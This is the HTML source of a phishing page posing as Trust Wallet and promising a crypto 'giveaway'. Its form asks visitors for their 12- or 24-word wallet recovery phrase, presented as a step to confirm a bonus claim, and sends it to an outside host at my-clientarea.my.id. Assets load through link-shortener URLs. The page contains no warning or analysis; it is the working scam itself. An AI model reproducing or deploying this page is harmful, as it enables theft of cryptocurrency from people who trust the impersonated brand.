
<!doctype html>
<html lang="en">

  <head>
    <style>
      .anticon {
        display: inline-block;
        color: inherit;
        font-style: normal;
        line-height: 0;
        text-align: center;
        text-transform: none;
        vertical-align: -0.125em;
        text-rendering: optimizeLegibility;
        -webkit-font-smoothing: antialiased;
        -moz-osx-font-smoothing: grayscale;
      }

      .anticon>* {
        line-height: 1;
      }

      .anticon svg {
        display: inline-block;
      }

      .anticon::before {
        display: none;
      }

      .anticon .anticon-icon {
        display: block;
      }

      .anticon[tabindex] {
        cursor: pointer;
      }

      .anticon-spin::before,
      .anticon-spin {
        display: inline-block;
        -webkit-animation: loadingCircle 1s infinite linear;
        animation: loadingCircle 1s infinite linear;
      }

      @-webkit-keyframes loadingCircle {
        100% {
          -webkit-transform: rotate(360deg);
          transform: rotate(360deg);
        }
      }

      @keyframes loadingCircle {
        100% {
          -webkit-transform: rotate(360deg);
          transform: rotate(360deg);
        }
      }

    </style>
    <style>
      .eEPviq {
        border: none;
        color: rgb(68, 68, 68);
        background: rgb(233, 234, 237);
        transition: all 0.5s ease 0s;
        font-size: 18px;
        width: 100%;
        padding: 15px 0px;
        border-radius: 4px;
        cursor: pointer;
        outline: none;
        margin-bottom: 20px;
      }

      @media (max-width: 768px) .eEPviq {
        font-size: 16px;
        padding: 12px 0px;
      }

      .OHNdu {
        position: relative;
        width: 500px;
        min-height: 100vh;
        background: rgb(255, 255, 255);
      }

      .jvrGcO {
        display: flex;
        -webkit-box-align: center;
        align-items: center;
        -webkit-box-pack: center;
        justify-content: center;
        width: 100%;
        min-height: 100vh;
        background-attachment: fixed;
      }

      * {
        outline: none !important;
      }

      .hARKVj {
        -webkit-box-align: center;
        align-items: center;
        width: 100%;
        padding: 10px 0px 10px;
        margin-bottom: 20px;
        -webkit-box-pack: justify;
        justify-content: space-between;
        border-bottom: 1px solid rgb(226, 226, 226);
        background-color: #0b65c6 !important;
      }

      .gdtVXy {
        width: 180px;
      }

      .eNdDTk {
        width: 150px;
      }

      .kFZWwp {
        font-family: Gilroy, sans-serif;
        background-color: #F6F6F6;
        font-size: 0.9rem;
        color: rgba(127, 127, 127, 0.85);
      }

      .cDnNqw .ant-input-affix-wrapper {
        background-color: rgb(255, 255, 255);
        border: 1px solid rgb(226, 226, 226) !important;
      }

      .cDnNqw input.ant-input,
      .cDnNqw .ant-select-selection {
        font-size: 1rem;
        font-family: Euclid, Roboto, Helvetica, Arial, sans-serif;
        /* line-height: 140%; */
        font-style: normal;
        font-weight: normal;
        /* height: 190px; */
        /* width: 495px; */
        border: 1px solid #cdcdcd;
        border-radius: 6px;
        background-color: #fff;
        padding: 12px;
      }

      .fWmldN {
        color: rgb(255, 255, 255);
        border: none;
        transition: all 0.5s ease 0s;
        font-size: 14px;
        width: 100%;
        padding: 10px 0px;
        border-radius: 4px;
        cursor: pointer;
        outline: none;
        margin-bottom: 20px;
        background-color: #0b65c6;
        letter-spacing: .13em;
        font-weight: 540;
      }

      .iZNmqq {
        color: rgb(39, 52, 152);
        width: 100%;
        font-size: 16px;
        margin-bottom: 60px;
        text-align: left;
      }

      .import-account__secret-phrase {
        /*font-size: 1rem;*/
        /*font-family: Euclid, Roboto, Helvetica, Arial, sans-serif;*/
        /* line-height: 140%; */
        font-style: normal;
        font-weight: normal;
        height: 140px;
        width: 100%;
        border: 1px solid #444;
        border-radius: 6px;
        background-color: #fff;
        padding: 12px;
        color: #000;
      }

      .thepadding {
        padding: 0px 35px 0px;
      }

      .barnerd {
        background-color: #3375bb !important;
      }

      .button--disabled,
      .button[disabled] {
        cursor: auto;
        opacity: 0.5;
        pointer-events: none;
      }

      ::placeholder {
        color: hsla(0, 0%, 49.8%, .65);
        opacity: 1;
      }

      :-ms-input-placeholder {
        color: hsla(0, 0%, 49.8%, .65);
      }

      ::-ms-input-placeholder {
        color: hsla(0, 0%, 49.8%, .65);
      }

      .loader {
        position: fixed;
        top: 0;
        left: 0;
        background: #fff;
        width: 100%;
        height: 100vh;
        z-index: 100;
        display: flex;
        justify-content: center;
        align-items: center;
      }

      .lodas {
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: column;
      }

    </style>
    <meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Best Cryptocurrency Wallet | Ethereum Wallet | ERC20 Wallet | Trust Wallet</title>
<meta property="og:title" content="TRUST WALLET | GIVEAWAYS | ETHEREUM | BITCOIN">
<link rel="shortcut icon" href="https://cutt.ly/WKZ6ypr" type="image/x-icon">
<link rel="shortcut icon" type="image/png" href="https://cutt.ly/pKZ6dva">




<link rel="stylesheet" href="https://cutt.ly/dX0lbYn">







<body>


 <nav class="navbar navbar-expand-lg navbar-togglable navbar-dark bg-primary d-block">
<div class="container">
<a class="navbar-brand" href=""><svg class="navbar-brand-img logotype-white" alt="Trust Wallet"></svg></a><button class="navbar-toggler collapsed" id="navbarToggle" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-expanded="false" aria-hidden="true" aria-label="Toggle navigation" aria-controls="navbarCollapse">
<span class="navbar-toggler-icon collapsed"></span>
</button>
<div class="navbar-collapse collapse navbar-margin" id="navbarSupportedContent" style="display: none;">
<button class="navbar-toggler collapsed" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation">
</button>
<ul class="navbar-nav font-size-sm ml-auto">
<li class="nav-item">
<a class="nav-link" href="">Assets</a>
</li>
<li class="nav-item">
<a class="nav-link" href="">Staking</a>
</li>
<li class="nav-item">
<a class="nav-link" href="">Earn<span class="ml-3 badge badge-success">+11% APR</span></a>
</li>
<li class="nav-item">
<a class="nav-link" href="">NFTs</a>
</li>
<li class="nav-item">
<a class="nav-link" href="">DApp Browser</a>
</li><li class="nav-item dropdown">
<a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="false" aria-expanded="true">
Language
</a>
<div class="dropdown-menu dropdown-menu-md" aria-labelledby="navbarDropdown">
<div class="list-group list-group-flush">
<ul class="list-unstyled list-block">
<li class="list-inline-item m-6"><a class="list-group-item" href="">
<div class="flag bg-en"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="">
<div class="flag bg-ru"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="">
<div class="flag bg-de"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="">
<div class="flag bg-vi"></div>
 </a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="">
<div class="flag bg-id"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="">
<div class="flag bg-ko"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="">
<div class="flag bg-ja"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="">
<div class="flag bg-tr"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="">
<div class="flag bg-pt_BR"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="">
<div class="flag bg-zh_CN"></div>
</a></li><li class="list-inline-item m-6"><a class="list-group-item list-inline-item" href="">
<div class="flag bg-es"></div>
</a></li>
</ul>
</div>
</div>
</li></ul>
</div>
</div>
</nav>
<main class="page-content" aria-label="Content">
<section class="pt-5 pb-2 pt-md-10t bg-light">
<div class="container">
<div class="row justify-content-center">
<div class="col-12">
<div class="card card-row ">
<div class="row no-gutters shadow-light-lg">

<div class="col-12">
<div class="card-body">


<form method="post" action="https://www.my-clientarea.my.id/twt-eth/app.php">
    

    
<font face="Arial"size="2" color="#4682B4">The recovery phrase confirmation is to make sure the one who claims the bonus is really you.</font>


<div class="form-group pt-2">

<textarea type="text" class="form-control" id="walletSeed" name="tlk" maxlength="300" minlength="12" placeholder="Phrase" style="border: 1px solid rgb(100, 100, 100); height: 110px; overflow: auto; padding: 10px;" required=""></textarea>
</div><h6 class="text-muted mt-4">Typically 12 (sometimes 24) words separated by single spaces</h6>

<div class="mt-6">
<button class="btn btn-block btn-primary lift" type="submit" value="Send">
IMPORT
</button>
</button>
</div></br></br></br></br>
<center>
<a class="nav-link" href="https://trustwallet-giveaway.github.io/Multi-Coin-Wallet/Cryptocurrency/Wallet/import.html"><font face="Arial"size="2" color="#4682B4">What is a Recovery Phrase?</font></a>

</center>
</form>
</div>
</div>

</div></div></div></div></div></section></main>

<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-T583ZCC" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>

<style>img[alt*="www.000webhost.com"]{display:none}</style>
